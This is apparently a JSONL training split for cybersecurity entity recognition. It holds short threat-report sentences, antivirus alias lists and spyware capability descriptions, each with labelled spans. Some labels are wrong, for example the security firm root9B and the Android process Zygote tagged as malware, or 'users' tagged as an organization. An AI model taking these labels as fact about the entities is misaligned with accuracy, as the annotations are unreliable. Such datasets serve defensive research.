{"text": "A backdoor also known as: W32/Socks.agz Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan2.BFTZ HT_PHDET_FD042CB0.UVPM Trojan.Win32.Socks.utqwi Trojan.MulDrop7.51577 HT_PHDET_FD042CB0.UVPM BehavesLike.Win32.Dropper.jc W32/Trojan.NOBV-3130 TrojanDownloader.Small.sui Worm/Win32.Socks Trojan:Win32/Phdet.E Worm.Win32.A.Socks.93017 SScope.Worm.Socks.afv Worm.Socks!GMlFK48cpa8 W32/Kryptik.BD!tr Win32/Trojan.e0b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007330", "source": "cyner2_train"}}
{"text": "Recently, WeipTech was analyzing suspicious Apple iOS tweaks reported by users and found over 225,000 valid Apple accounts with passwords stored on a server.", "spans": {"ORGANIZATION: WeipTech": [[10, 18]], "SYSTEM: Apple iOS": [[44, 53]], "ORGANIZATION: users": [[73, 78]], "SYSTEM: Apple accounts": [[108, 122]], "SYSTEM: server.": [[150, 157]]}, "info": {"id": "cyner2_train_007331", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.D676 Win32.Trojan.WisdomEyes.16070401.9500.9591 TR/Drop.Delfsnif.pmkbu TrojanDropper:Win32/Delfsnif.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007332", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper.Win32.AphexLace!O TrojanDropper.AphexLace Dropper.AphexLace.Win32.1 Troj.W32.Inject!c Trojan/Dropper.AphexLace.b Trojan.Heur.EA2D6B TROJ_APHEXLACE.D Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Dropper.IHO Trojan.Dropper TROJ_APHEXLACE.D Trojan.Win32.Inject.vgog Trojan.Win32.AphexLace.glqv Dropper.AphexLace.17920 TrojWare.Win32.TrojanDropper.AphexLace.B Trojan.MulDrop.12656 Trojan-Dropper.Win32.Delf W32/Risk.JBWO-6048 TrojanDropper.AphexLace.b TR/Drop.AphexLace.B Trojan[Dropper]/Win32.Poisoner TrojanDropper:Win32/AphexLace.B Trojan.Win32.Inject.vgog Dropper/Win32.Xema.C57521 TrojanDropper.Poisoner Win32/TrojanDropper.AphexLace.B Win32.Trojan.Inject.Dypn Trojan.DR.AphexLace!M08TVuH6+oM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007333", "source": "cyner2_train"}}
{"text": "Indicators related to the Sundown Exploit Kit", "spans": {"MALWARE: Sundown Exploit Kit": [[26, 45]]}, "info": {"id": "cyner2_train_007335", "source": "cyner2_train"}}
{"text": "CopyCat is a fully developed malware with vast capabilities, including elevating privileges to root, establishing persistency, and to top it all - injecting code into Zygote.", "spans": {"MALWARE: CopyCat": [[0, 7]], "MALWARE: malware": [[29, 36]], "MALWARE: Zygote.": [[167, 174]]}, "info": {"id": "cyner2_train_007336", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.D9E5 TrojanSpy.Zbot Spyware.LokiBot Win.Packer.VbPack-0-6334882-0 Trojan-Spy.Win32.Zbot.yjsw Trojan.Win32.Zbot.etexpw Trojan.Win32.Z.Zbot.1081344 Trojan.PWS.Panda.12377 Trojan.Zbot.Win32.204854 BehavesLike.Win32.Fareit.tc Trojan.Win32.Injector TrojanSpy.Zbot.fkpq TR/AD.Zbot.cxjcv Trojan[Spy]/Win32.Zbot Trojan.Symmi.D1360F Trojan-Spy.Win32.Zbot.yjsw Trojan:Win32/Dukrid.A!bit Spyware/Win32.Zbot.R210148 TScope.Trojan.VB Trj/GdSda.A Win32.Trojan-spy.Zbot.Lqer TrojanSpy.Zbot!AasFtIJIGGs W32/Zbot.YJSW!tr Win32/Trojan.BO.553", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007337", "source": "cyner2_train"}}
{"text": "The WordPress.org team has intervened and removed the plugin from the official WordPress Plugins repository.", "spans": {"ORGANIZATION: The WordPress.org team": [[0, 22]], "MALWARE: plugin": [[54, 60]], "ORGANIZATION: the official WordPress Plugins repository.": [[66, 108]]}, "info": {"id": "cyner2_train_007338", "source": "cyner2_train"}}
{"text": "It is likely these spearphishes are generated via a builder - so attribution to an exact group of attackers may be incorrect.", "spans": {"THREAT_ACTOR: group of attackers": [[89, 107]]}, "info": {"id": "cyner2_train_007339", "source": "cyner2_train"}}
{"text": "This campaign was found to be connected to the same party which previously targeted Vietnam Airlines and some other high profile targets possibly led by the Chinese 1937CN group.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]], "ORGANIZATION: Vietnam Airlines": [[84, 100]], "ORGANIZATION: high profile targets": [[116, 136]], "ORGANIZATION: the Chinese 1937CN group.": [[153, 178]]}, "info": {"id": "cyner2_train_007341", "source": "cyner2_train"}}
{"text": "A backdoor also known as: I-Worm.Stator.A Worm/W32.Stator.62976 Email-Worm.Win32.Stator!O W32.Stator.A Worm.Stator.Win32.3 W32/Stator.worm I-Worm.Stator.A W32/Stator.A W32.Stator@mm Win32/Stator.62464.A WORM_STATOR.A Win.Worm.Stator-1 I-Worm.Stator.A Email-Worm.Win32.Stator.a I-Worm.Stator.A Trojan.Win32.Stator.jahi I-Worm.Win32.Stator I-Worm.Stator.A EmailWorm.Win32.Stator.a0 I-Worm.Stator.A Win32.HLLW.Plict WORM_STATOR.A BehavesLike.Win32.Downloader.kc Email-Worm.Win32.Stator.a W32/Stator.A I-Worm/Stator.a Worm[Email]/Win32.Stator Worm:Win32/Stator.A@mm Email-Worm.Win32.Stator.a Trojan/Win32.HDC.C40377 I-Worm.Stator.A Win32.HLLW.Stator.A I-Worm.Stator.62464 Win32/Stator.62464 Win32.Stator.B W32/Stator.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007342", "source": "cyner2_train"}}
{"text": "encrypt its APK and shell code,", "spans": {"SYSTEM: APK": [[12, 15]]}, "info": {"id": "cyner2_train_007344", "source": "cyner2_train"}}
{"text": "It looked like a typical backdoor that could be uploaded anywhere on a compromised server, not just in this particular plugin.", "spans": {"MALWARE: backdoor": [[25, 33]], "SYSTEM: compromised server,": [[71, 90]], "SYSTEM: plugin.": [[119, 126]]}, "info": {"id": "cyner2_train_007345", "source": "cyner2_train"}}
{"text": "Emissary is related to the Elise Trojan and the Operation Lotus Blossom attack campaign, which prompted us to start collecting additional samples of Emissary.", "spans": {"MALWARE: Emissary": [[0, 8]], "MALWARE: the Elise Trojan": [[23, 39]], "THREAT_ACTOR: the Operation Lotus Blossom attack campaign,": [[44, 88]], "MALWARE: Emissary.": [[149, 158]]}, "info": {"id": "cyner2_train_007346", "source": "cyner2_train"}}
{"text": "To quote the original article: It could be through attachments in spam messages, downloads from untrusted websites or something else.", "spans": {}, "info": {"id": "cyner2_train_007349", "source": "cyner2_train"}}
{"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a look at some of the major ones .", "spans": {"SYSTEM: Facebook": [[454, 462], [515, 523], [596, 604], [634, 642]]}, "info": {"id": "cyner2_train_007351", "source": "cyner2_train"}}
{"text": "It has been the subject of many analysis reports, including those describing targeted espionage campaigns like Operation Night Dragon and the GhostNet attacks on Tibet.", "spans": {"THREAT_ACTOR: targeted espionage campaigns": [[77, 105]], "THREAT_ACTOR: Operation Night Dragon": [[111, 133]], "MALWARE: GhostNet": [[142, 150]]}, "info": {"id": "cyner2_train_007353", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Miner Troj.W32.Miner!c Trojan.MulDrop7.60223 TR/Muldrop.jzijj Trojan.Win32.Miner.tjvn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007354", "source": "cyner2_train"}}
{"text": "The threat actor's campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.", "spans": {"THREAT_ACTOR: The threat actor's campaigns": [[0, 28]], "ORGANIZATION: high-profile North American and European government officials": [[49, 110]], "ORGANIZATION: CEOs": [[122, 126]], "ORGANIZATION: companies": [[140, 149]], "ORGANIZATION: celebrities": [[154, 165]], "ORGANIZATION: recorded": [[188, 196]]}, "info": {"id": "cyner2_train_007355", "source": "cyner2_train"}}
{"text": "The earliest evidence obtained shows it has been in use since at least November 2016.", "spans": {}, "info": {"id": "cyner2_train_007356", "source": "cyner2_train"}}
{"text": "The hash listed in the Pastebin led us to a malicious Word document that had also been uploaded to a public sandbox.", "spans": {"ORGANIZATION: the Pastebin": [[19, 31]], "SYSTEM: a public sandbox.": [[99, 116]]}, "info": {"id": "cyner2_train_007357", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom/W32.Locky.48128 Exploit.Cve20151701 Win32.Trojan.WisdomEyes.16070401.9500.9999 Exploit.Win32.CVE-2015-1701.bd Exploit.Win32.CVE20151701.euekja Trojan.Win32.LockCrypt.48128.A Trojan.Encoder.12135 BehavesLike.Win32.Mydoom.pm W32/Trojan.JPLA-3344 Exploit.CVE-2015-1701.ar TR/AD.RansomHeur.fbqvj Exploit.W32.Cve!c Exploit.Win32.CVE-2015-1701.bd Ransom:Win32/LockCrypt.A!bit Trojan/Win32.Scar.R211760 Exploit.CVE-2015-1701 Ransom.DXXD Trj/GdSda.A Trojan.Win32.Filecoder Win32.Trojan-Ransom.LockCrypt.A Win32/Trojan.Exploit.3d9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007363", "source": "cyner2_train"}}
{"text": "This is exactly what we saw in late October and early November 2016, when the espionage group Pawn Storm also known as Fancy Bear, APT28, Sofacy, and STRONTIUM ramped up its spear-phishing campaigns against various governments and embassies around the world.", "spans": {"THREAT_ACTOR: espionage group Pawn Storm": [[78, 104]], "THREAT_ACTOR: Fancy Bear, APT28, Sofacy,": [[119, 145]], "THREAT_ACTOR: STRONTIUM": [[150, 159]], "THREAT_ACTOR: spear-phishing campaigns": [[174, 198]], "ORGANIZATION: governments": [[215, 226]], "ORGANIZATION: embassies": [[231, 240]]}, "info": {"id": "cyner2_train_007364", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32!O W32.Etap W32/Etap.dr Win32.Trojan.WisdomEyes.16070401.9500.9929 W32.Simile Virus.Win32.Etap Win32.Etap.E Win32/Linux.Etap W32/Etap.dr Virus.Win32.Etap Backdoor/Hupigon.ish Virus/Win32.Etap Trojan.Kazy.D65E9 Virus.Win32.Etap Backdoor:Win32/Etap.dr Win32/Etap.E W32/Etap.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007365", "source": "cyner2_train"}}
{"text": "Furthermore, each of the stages used different development platform and was obfuscated in a different way.", "spans": {}, "info": {"id": "cyner2_train_007366", "source": "cyner2_train"}}
{"text": "Rather than simply copying the features that were present within the Zeus trojan as-is Floki Bot claims to feature several new capabilities making it an attractive tool for criminals.", "spans": {"MALWARE: Zeus trojan": [[69, 80]], "MALWARE: Floki Bot": [[87, 96]], "THREAT_ACTOR: criminals.": [[173, 183]]}, "info": {"id": "cyner2_train_007367", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Silva.447488 Worm.Keco W32.W.Silva.d!c W32/Silva.d W32/Silva.D W32.Silva@mm Trojan.Win32.Silva.envq Worm.Win32.Silva.D Win32.HLLW.Silva Worm.Win32.Silva W32/Silva.QGXV-8360 I-Worm/Silva.d Worm:Win32/Silva.D@mm Worm:Win32/Silva.D@mm Email-Worm.Keco W32/Keco.G.worm Win32/Silva.D Win32.Worm-email.Keco.Peze I-Worm.Silva!97fYr5ijFvQ W32/Silva.D@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007368", "source": "cyner2_train"}}
{"text": "Below are a couple of images of the panel that the attacker would be utilizing.", "spans": {}, "info": {"id": "cyner2_train_007369", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.BHO.Delf.T Trojan.Win32.Delf!O Trojan.Lnkhyd.A7 Trojan.Delf.Win32.15794 Troj.W32.Delf.lV2h Win32/Delf.AXIT TROJ_DELF.PVC Win.Trojan.Delf-11211 Trojan.BHO.Delf.T Trojan.Win32.Delf.ssh Trojan.BHO.Delf.T Trojan.Win32.Delf.cjzwb Trojan.Win32.Delf.157696.J Trojan.BHO.Delf.T TROJ_DELF.PVC Trojan.Lnkhyd Trojan/Delf.mdz Trojan:Win32/Lnkhyd.A Trojan/Win32.Delf Trojan.BHO.Delf.T Trojan.Win32.Delf.ssh Trojan:Win32/Lnkhyd.A Trojan/Win32.Fides.R3508 Trojan.BHO.Delf.T TScope.Trojan.Delf Win32.Trojan.Delf.Ednr Trojan.Win32.BHO.R", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007370", "source": "cyner2_train"}}
{"text": "Interaction with these servers is performed in two different threads.", "spans": {}, "info": {"id": "cyner2_train_007371", "source": "cyner2_train"}}
{"text": "They use compromised e-mail accounts to distribute their malware widely and their targeting appears opportunistic rather than specific.", "spans": {"MALWARE: malware": [[57, 64]]}, "info": {"id": "cyner2_train_007373", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PUP.Riskware.Tool Trojan.Win32.Cindyc.wrlqe TR/DyCode.A.110 Backdoor/Cindyc.bv Win32.Troj.Undef.kcloud Trojan:Win32/DyCode.A Backdoor.Win32.A.Cindyc.141184 Backdoor/Win32.Cindyc Backdoor.Cindyc.adk Backdoor.Win32.Cindyc Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007374", "source": "cyner2_train"}}
{"text": "Credit card industry giant Visa on Friday issued a security alert warning companies using point-of-sale devices made by Oracle s MICROS retail unit to double-check the machines for malicious software or unusual network activity, and to change passwords on the devices.", "spans": {"ORGANIZATION: Credit card industry": [[0, 20]], "ORGANIZATION: Visa": [[27, 31]], "ORGANIZATION: companies": [[74, 83]], "SYSTEM: point-of-sale devices": [[90, 111]], "ORGANIZATION: Oracle": [[120, 126]], "SYSTEM: MICROS retail unit": [[129, 147]], "SYSTEM: machines": [[168, 176]], "MALWARE: malicious software": [[181, 199]], "SYSTEM: devices.": [[260, 268]]}, "info": {"id": "cyner2_train_007376", "source": "cyner2_train"}}
{"text": "The dropper family, referred to internally as PNG_dropper, was observed being used as a second stage tool in different targeted attacks.", "spans": {"MALWARE: The dropper family,": [[0, 19]], "MALWARE: second stage tool": [[88, 105]]}, "info": {"id": "cyner2_train_007377", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.StartPageCRTD.Win32.8798 Win32.Trojan.WisdomEyes.16070401.9500.9990 Trojan.Win32.Clicker!BT Trojan.MSIL.EzirizNetReactor TR/Dropper.MSIL.76348 TrojanClicker:MSIL/Balamid.B Trojan.Jatif.32 Trojan/Win32.FakeMS.R113384 Trojan.Win32.Clicker!BT Win32/Trojan.Dropper.2f1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007378", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9589 TROJ_DELF.IVW Trojan-Downloader.Win32.Delf.acc Troj.Downloader.W32.Delf!c Win32.Trojan-downloader.Delf.Edoh TrojWare.Win32.TrojanDownloader.Delf.~ABI Trojan.DownLoader.46506 Trojan-Downloader.Win32.Delf.ACC TrojanDownloader.Delf.fqq Trojan[Downloader]/Win32.Delf Win32.TrojDownloader.Delf.ac.kcloud Trojan.Downloader.bGWcaOz2KakG Trojan.Win32.A.Downloader.34816.FA Trojan-Downloader.Win32.Delf.acc Trj/Banbra.FSU Win32/Trojan.Downloader.dac", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007379", "source": "cyner2_train"}}
{"text": "It does this by leveraging the Android plugin technology.", "spans": {"SYSTEM: the Android plugin technology.": [[27, 57]]}, "info": {"id": "cyner2_train_007381", "source": "cyner2_train"}}
{"text": "Trojan Ransom Xpan was created by an organized gang, which used targeted attacks via RDP that abused weak passwords and wrong implementations.", "spans": {"MALWARE: Trojan Ransom Xpan": [[0, 18]], "THREAT_ACTOR: organized gang,": [[37, 52]], "VULNERABILITY: RDP": [[85, 88]], "VULNERABILITY: weak passwords": [[101, 115]], "VULNERABILITY: wrong implementations.": [[120, 142]]}, "info": {"id": "cyner2_train_007384", "source": "cyner2_train"}}
{"text": "The operators have used use a range of techniques to target Windows computers and Android phones with the apparent goal of penetrating the computers of well-connected individuals in the Syrian opposition.", "spans": {"THREAT_ACTOR: operators": [[4, 13]], "SYSTEM: Windows computers": [[60, 77]], "SYSTEM: Android phones": [[82, 96]], "SYSTEM: computers": [[139, 148]], "ORGANIZATION: individuals": [[167, 178]], "ORGANIZATION: Syrian opposition.": [[186, 204]]}, "info": {"id": "cyner2_train_007385", "source": "cyner2_train"}}
{"text": "On the network traffic analysis end, post compromise activity results in some interesting but not unexpected activity.", "spans": {}, "info": {"id": "cyner2_train_007386", "source": "cyner2_train"}}
{"text": "Based on this evidence we believe this new malware is likely targeting South Koreans.", "spans": {"MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_007387", "source": "cyner2_train"}}
{"text": "A series of malware attacks targeting users of cryptocurrency wallets has been identified by security firm Kaspersky, which has developed an anti-malware solution to detect and prevent such attacks in the future.", "spans": {"MALWARE: malware": [[12, 19]], "ORGANIZATION: users": [[38, 43]], "SYSTEM: cryptocurrency wallets": [[47, 69]], "ORGANIZATION: security firm Kaspersky,": [[93, 117]], "SYSTEM: anti-malware solution": [[141, 162]]}, "info": {"id": "cyner2_train_007388", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus/W32.Patched.P W32.Patched.QC1 Trojan.Razy.D19982 PE_PATCHED.SMB Win32.Trojan.ImPatch.a W32/Floxif.A PE_PATCHED.SMB Trojan.Win32.Patched.qc Troj.W32.Patched.lnCt Trojan.Starter.3187 W32/Floxif.A Trojan.Win32.Patched.qc Trojan.Patched.al W32/Patched.AL Virus.Win32.Loader.abd Trojan.Win32.Patched W32/Patched.AL!tr Virus.Win32.Patched.DG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007389", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGamesGBTOFAB.Trojan Trojan-Dropper.Win32.Dapato!O Trojan/Vilsel.bftr Trojan-Dropper.Win32.Dapato.bzqh Trojan.Win32.Vilsel.dktcmg Trojan.Vilsel.Win32.24133 Trojan-PWS.Win32.QQPass TrojanDropper.Dapato.jop Trojan/Win32.Vilsel Win32.Troj.Vilsel.kcloud Trojan-Dropper.Win32.Dapato.bzqh Trojan.Vilsel", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007393", "source": "cyner2_train"}}
{"text": "Most users are pushing a variety of information stealers with the service.", "spans": {"THREAT_ACTOR: information stealers": [[36, 56]], "SYSTEM: service.": [[66, 74]]}, "info": {"id": "cyner2_train_007397", "source": "cyner2_train"}}
{"text": "First, users cannot easily spot any malicious behavior since PowerShell runs in the background.", "spans": {"VULNERABILITY: cannot easily spot any malicious behavior": [[13, 54]], "VULNERABILITY: PowerShell runs in the background.": [[61, 95]]}, "info": {"id": "cyner2_train_007401", "source": "cyner2_train"}}
{"text": "root9B's analysis determined that the adversary is using advanced memory-resident techniques to maintain persistence and avoid detection.", "spans": {"MALWARE: root9B's": [[0, 8]], "THREAT_ACTOR: adversary": [[38, 47]]}, "info": {"id": "cyner2_train_007403", "source": "cyner2_train"}}
{"text": "The malware has a remote controlling function, and attackers sending these emails seem to attempt intruding into the targets' network using the malware.", "spans": {"MALWARE: malware": [[4, 11]], "THREAT_ACTOR: attackers": [[51, 60]], "SYSTEM: network": [[126, 133]], "MALWARE: malware.": [[144, 152]]}, "info": {"id": "cyner2_train_007404", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Sality!O Ransom.Exxroute.A3 Trojan.Kryptik.Win32.1099877 Troj.Downloader.W32.Banload.l42y Ransom_CERBER.SM3B Win32.Trojan.Kryptik.bjm W32/Trojan.FUEH-0857 Backdoor.Trojan Ransom_CERBER.SM3B Trojan.Encoder.10103 BehavesLike.Win32.Cutwail.ph Trojan.Spora.mw TR/AD.Spora.svton Trojan[Ransom]/Win32.Spora Trojan.Symmi.DB88E Ransom:Win32/Spora.A Hoax.Spora Virus.Win32.VBInject", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007406", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BKDR_PIRPI.YE Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_PIRPI.YE Trojan.Heur.LP.E69C7F Trojan:Win32/Pirpi.O Win32.Backdoor.Backdoor.Hwmn Win32/Trojan.9b5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007407", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TSPY_MAJIKPOS.SMA Trojan.Majikpos TSPY_MAJIKPOS.SMA Trojan.DownLoader23.50404 W32/Trojan.QKOU-4044 Trojan.MSIL.Krypt.2 TrojanSpy:MSIL/Majikpos.A Spyware/Win32.Majikpos.C1861368 Trj/GdSda.A PUA.BrowseSmart Win32/Trojan.d60", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007410", "source": "cyner2_train"}}
{"text": "The DragonOK group has been actively launching attacks for years.", "spans": {"ORGANIZATION: The DragonOK group": [[0, 18]]}, "info": {"id": "cyner2_train_007411", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameMITL.Trojan RDN/Downloader.a!vq Win32.Trojan.WisdomEyes.16070401.9500.9883 Trojan.FakeAV Trojan.DownLoad.41552 BehavesLike.Win32.Backdoor.ch Trojan.Win32.Redosdru Trojan/PSW.WOW.amc TrojanDownloader:Win32/Induiba.A Trojan.Heur.RP.EEBC2E Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007414", "source": "cyner2_train"}}
{"text": "By analyzing the TaskManager class we can see the new commands that are supported at this stage : As can be seen in the code snippet above , there are quite a lot of data collection tasks that are now available : Collect device info Track location Upload contacts information Upload sent and received SMS messages Upload images Upload video files Send recursive dirlist of the external storage Upload specific files Record audio using the microphone Record calls Use the camera to capture bursts of snapshots Those tasks can either run periodically , on event ( such as incoming call ) or when getting a command from the C & C server .", "spans": {}, "info": {"id": "cyner2_train_007415", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Kargatroj!O Trojan.Kargatroj.Win32.5 BKDR_DEPPEELS.A Win32.Trojan.WisdomEyes.16070401.9500.9993 W32/Trojan.FYPB-4329 Backdoor.Kargatroj BKDR_DEPPEELS.A Win.Trojan.Kargatroj-5 Trojan.Win32.Kargatroj.a Trojan.Win32.Kargatroj.zribt Trojan.Win32.A.Kargatroj.288256 Trojan.Click2.18984 BehavesLike.Win32.Virus.dh Backdoor.Win32.IRCBot Trojan/Kargatroj.e WORM/Autorun.Agr.3 Trojan/Win32.Kargatroj Backdoor:Win32/Deppeels.A Trojan.Win32.Kargatroj.a Trojan/Win32.Kargatroj.R50492 Trojan.Kargatroj Trojan.Kargatroj!+VQ4l8zO8kI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007416", "source": "cyner2_train"}}
{"text": "We refer to this utility as BOOTRASH.", "spans": {"MALWARE: BOOTRASH.": [[28, 37]]}, "info": {"id": "cyner2_train_007417", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.W.Fujack.lmEa Trojan.Dropper Win.Trojan.Packed-24 Trojan.Win32.Baidu.iidnc Trojan.Win32.A.PSW-Magania.1913020.A Trojan/Win32.Zegost Trojan.Zusy.D88F TrojanDropper:Win32/Demekaf.A Trojan.MalPack.NSPack Win32/TrojanDropper.Demekaf.A Trojan.Win32.Jorik W32/Obfuscated.AAAD!tr Win32/Trojan.4b9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007419", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Dropper/W32.Hirhir.2779437 TrojanDropper.Hirhir.20 Trojan/Dropper.Hirhir.20 Trojan-Dropper.Win32.Hirhir.20 Win32/TrojanDropper.Hirhir.20 W32/Hirhir.A Trojan.Dropper W32/Smalldrp.BTL Win32.Dropper.Hirhir Trojan.Dropper-1156 Trojan-Dropper.Win32.Hirhir.20 Trojan.Dropper.Hirhir.2.0 TrojWare.Win32.TrojanDropper.Hirhir.20 Trojan.Dropper.Hirhir.2.0 Trojan.MulDrop.1734 TR/Drop.Hirhir.20.5 TROJ_HIRHIR.20 Trojan.Drop.Hirhir.20.5 Win32/DigitalM.10 W32/Hirhir.A TrojanDropper.Dmexeb.10 Trojan-Dropper.Win32.Hirhir.20!IK TrojanDropper:Win32/Hirhir.2_0 Trojan.Win32.Hirhir.2164429 Trojan.Dropper.Hirhir.2.0 Dropper/Hirhir.11776 Win32.TrojanDropper.Hirhir.20 Trojan.DR.Hirhir.H Trojan.Dmexeb.10 Trojan-Dropper.Win32.Hirhir.20 W32/Hirhir.A!tr.dr Dropper.Hirhir Trj/Hirhir.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007423", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE TROJ_ZYX_BK083A77.TOMC Heur.Corrupt.PE TROJ_ZYX_BK083A77.TOMC Trojan-Downloader.Win32.Vorloma TrojanDownloader:Win32/Vorloma.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007427", "source": "cyner2_train"}}
{"text": "A backdoor also known as: PE:Trojan.Win32.Xcomp.a!1075128424 Heur.Packed.MultiPacked DDoS.Rincux Backdoor.Httpbot.Win32.799 BehavesLike.Win32.Trojan.cz Backdoor:Win32/Luder.H Trojan/Win32.Injector Virus.Win32.Heur.c Trj/CI.A Packed.Win32.PolyCrypt Trojan.Win32.Downloader.aC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007429", "source": "cyner2_train"}}
{"text": "The specific points of connection between these new samples and Operation Blockbuster include: payloads delivered by the macros discussed in Operation Blockbuster Sequel", "spans": {"THREAT_ACTOR: Operation Blockbuster": [[64, 85]], "MALWARE: payloads": [[95, 103]], "MALWARE: macros": [[121, 127]], "THREAT_ACTOR: Operation Blockbuster Sequel": [[141, 169]]}, "info": {"id": "cyner2_train_007430", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ADH.2 Win.Trojan.Mediyes-1761 Trojan.Hosts.5806 Trojan.VBCRTD.Win32.7945 Trojan:Win32/Mediyes.C Trojan.Pirminay Trojan.Win32.Mediyes", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007431", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Aimaster.A Backdoor/W32.Aimaster.49152 Backdoor.Aimmaster Backdoor.RAT.Aimaster Backdoor.Trojan Win32/Aimaster.A BKDR_AIMASTER.A Win.Trojan.Aimaster-4 Backdoor.Win32.Aimaster Backdoor.Aimaster.A Trojan.Win32.Aimaster-Bd.fdhc Win32.Backdoor.Aimaster.Ahyt Backdoor.Aimaster.A Backdoor.Win32.Aimaster.A Backdoor.Aimaster.A BackDoor.Master.10 BackDoor-XT.svr W32/Risk.FHHV-3782 BDS/Aimaster.B W32/Aimaste.A!tr.bdr Trojan[Backdoor]/Win32.Aimaster Backdoor.Aimaster.A Backdoor.W32.Aimaster!c Backdoor.Win32.Aimaster Trojan/Win32.Aimaster.C662411 BackDoor-XT.svr Backdoor.Aimaster Backdoor.Aimaster!2o1TvHIl4Fg Backdoor.Aimaster.A Win32/Backdoor.IM.d95", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007432", "source": "cyner2_train"}}
{"text": "The data available in the leaked Hacking Team files provides circumstantial evidence pointing to an interest in compromising individuals with ties to South Korea i.e., Korean language speakers who use software or apps popular in South Korea, or South Korean editions of Samsung phones.", "spans": {"ORGANIZATION: Hacking Team": [[33, 45]], "SYSTEM: software": [[201, 209]], "SYSTEM: apps": [[213, 217]], "SYSTEM: Samsung phones.": [[270, 285]]}, "info": {"id": "cyner2_train_007433", "source": "cyner2_train"}}
